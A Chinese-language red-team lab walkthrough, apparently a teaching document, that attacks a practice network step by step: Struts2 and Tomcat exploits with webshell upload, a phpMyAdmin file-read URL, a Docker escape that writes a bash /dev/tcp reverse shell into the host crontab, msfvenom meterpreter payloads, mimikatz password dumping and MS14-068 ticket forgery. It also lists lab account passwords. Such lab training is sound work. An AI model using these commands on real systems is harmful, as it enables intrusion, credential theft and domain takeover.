ATT&CK实战系列-红队实战(四)教学文档<\/h1>

实验环境配置<\/h2>

网络配置<\/h3>

添加仅主机网卡vmnet2<\/li>
网段：192.168.183.0\/24<\/li>

DHCP范围：192.168.183.128-192.168.183.255<\/li> <\/ul>

目标系统配置<\/h3>

攻击机<\/strong><\/p>

IP地址：192.168.183.128<\/li> <\/ul>
WEB服务器<\/strong><\/p>

账号密码：ubuntu:ubuntu<\/li>
IP地址：

192.168.183.129<\/li>
192.168.0.106 (双网卡)<\/li> <\/ul> <\/li> <\/ul>
WIN7主机<\/strong><\/p>

账号密码：douser:Dotest123<\/li>
IP地址：192.168.183.130<\/li> <\/ul>
DC(域控)<\/strong><\/p>

账号密码：administrator:Test2008<\/li> <\/ul>
信息收集阶段<\/h2>
端口扫描<\/h3>
发现服务器开启以下端口：<\/p>

22端口<\/li>
2001端口<\/li>
2002端口<\/li>
2003端口<\/li> <\/ul>
服务识别<\/h3>

2001端口：文件上传页面<\/li>
2002端口：Tomcat默认页面<\/li>
2003端口：phpmyadmin页面<\/li> <\/ul>
漏洞发现与利用<\/h2>
Struts2漏洞利用 (2001端口)<\/h3>
漏洞特征识别<\/strong><\/p>

查看HTTP响应头中是否包含X-Struts-Version字段<\/li>
检查URL中是否包含.action或.do后缀<\/li>
查看错误页面是否包含"Struts Problem Report"等字样<\/li>
检查是否存在\/struts\/webconsole.html路径<\/li> <\/ol>
利用方法<\/strong><\/p>

利用Struts2远程代码执行漏洞<\/li>
反弹shell<\/li>
设置监听端口<\/li>
获取shell上线<\/li> <\/ol>
Tomcat漏洞利用 (2002端口)<\/h3>
漏洞识别<\/strong><\/p>

暴露版本：8.5.19<\/li>
可能存在的漏洞：

CVE-2017-12615<\/li>
CVE-2017-12617<\/li>
CVE-2017-5664<\/li> <\/ul> <\/li> <\/ul>
利用方法<\/strong><\/p>

将HTTP请求方法改为PUT<\/li>
验证文件上传是否成功<\/li>
生成哥斯拉木马<\/li>
上传木马文件<\/li>
访问木马文件<\/li>
连接成功获取控制权<\/li> <\/ol>
PhpMyAdmin漏洞利用 (2003端口)<\/h3>
版本识别<\/strong><\/p>

PhpMyAdmin 4.8.1<\/li> <\/ul>
可能的攻击方法<\/strong><\/p>

SQL命令执行获取webshell（需满足条件：文件写入权限、知道网站绝对路径、目录可写）<\/li>
日志文件写入webshell<\/li>
CVE-2018-12613<\/li>
CVE-2018-19968<\/li> <\/ol>
CVE-2018-12613利用<\/strong><\/p>

漏洞描述：PHPMyAdmin 4.8.0到4.8.3版本中的高危漏洞，允许通过精心构造的请求读取服务器上的任意文件<\/li>
漏洞存在于index.php文件中对target参数的处理过程中<\/li>
利用步骤：

查看\/etc\/passwd文件：http:\/\/192.168.0.105:2003\/index.php?target=db_structure.php%253f\/etc\/passwd<\/code><\/li>
写入phpinfo：当前页面cookie中的phpmyadmin的值<\/li>
获取路径：http:\/\/192.168.0.105:2003\/index.php?target=db_structure.php%253f\/tmp\/sess_cookie<\/code><\/li>
写入木马<\/li>
访问木马<\/li>
连接成功<\/li> <\/ul> <\/li> <\/ol> Docker环境识别与逃逸<\/h2> Docker环境判断<\/h3> 检查根目录是否存在.dockerenv文件：ls -alh \/.dockerenv<\/code><\/li> 检查\/proc\/1\/cgroup是否含有docker字符串：cat \/proc\/1\/cgroup<\/code><\/li> <\/ol> Docker逃逸方法一<\/h3> 查看可挂载的磁盘：fdisk -l<\/code><\/li> 创建目录：mkdir \/test<\/code><\/li> 挂载磁盘：mount \/dve\/sda1 \/test<\/code><\/li> 切换到目录：cd \/test<\/code><\/li> 查看内容：ls<\/code><\/li> 查看\/etc\/shadow：cat \/etc\/shadow<\/code><\/li> 导出shadow文件，使用john破解<\/li> 使用ssh登录<\/li> <\/ol> Docker逃逸方法二（计划任务）<\/h3> 创建脚本文件：touch \/test\/test.sh<\/code><\/li> 写入反弹shell命令：echo "bash -i >& \/dev\/tcp\/IP\/端口 0>&1" >\/test\/test.sh<\/code><\/li> 添加计划任务：echo root bash \/test.sh" >> \/test\/etc\/crontab<\/code><\/li> 设置监听端口：nc -lvvp 9898<\/code><\/li> 等待shell连接<\/li> <\/ol> 内网渗透<\/h2> 内网信息收集<\/h3> 查看内网机器IP<\/li> 上传fscan进行扫描<\/li> 上线MSF<\/li> <\/ol> MSF木马生成与使用<\/h3> 生成木马： msfvenom -p linux\/x64\/meterpreter\/reverse_tcp LHOST=IP LPORT=端口 -f elf > XXX.elf <\/code><\/pre> <\/li> 将木马下载至目标机器并运行<\/li> MSF监听设置： use exploit\/multi\/handler set payload linux\/x64\/meterpreter\/reverse_tcp set lhost xx.xx.xx set lport 端口 run <\/code><\/pre> <\/li> 添加路由<\/li> <\/ol> 永恒之蓝攻击尝试<\/h3> 根据fscan扫描结果尝试永恒之蓝攻击<\/li> 多次尝试未成功<\/li> <\/ul> 域渗透技术<\/h2> 非域控机器利用<\/h3> 在非域控主机(WIN7)上收集工具： mimikatz.exe<\/li> MS14-068.exe<\/li> <\/ul> <\/li> <\/ol> Mimikatz使用<\/h3> 导出密码：mimikatz.exe sekurlsa::logonpasswords<\/code><\/li> 获取域成员SID<\/li> <\/ul> MS14-068提权<\/h3> 漏洞简介<\/strong><\/p> Microsoft Windows中Kerberos实现的严重漏洞<\/li> 影响所有Windows域控服务器<\/li> <\/ul> 受影响系统<\/strong><\/p> Windows Server 2003 SP2<\/li> Windows Server 2008 SP2\/R2 SP1<\/li> Windows Server 2012\/R2<\/li> Windows 7\/8\/8.1<\/li> <\/ul> 基本利用步骤<\/strong><\/p> 获取普通域用户凭证<\/li> 使用工具生成伪造的TGT票证<\/li> 将伪造票证注入当前会话<\/li> 获取域管理员权限<\/li> <\/ol> 总结<\/h2> 本实战演练涵盖了从外网渗透到内网横向移动的全过程，包括：<\/p> Web应用漏洞利用(Struts2、Tomcat、PhpMyAdmin)<\/li> Docker环境识别与逃逸技术<\/li> 内网信息收集与横向移动<\/li> 域渗透技术与权限提升<\/li> <\/ol> 关键点在于综合利用多种漏洞和技术手段，逐步深入目标网络，最终获取域控权限。<\/p>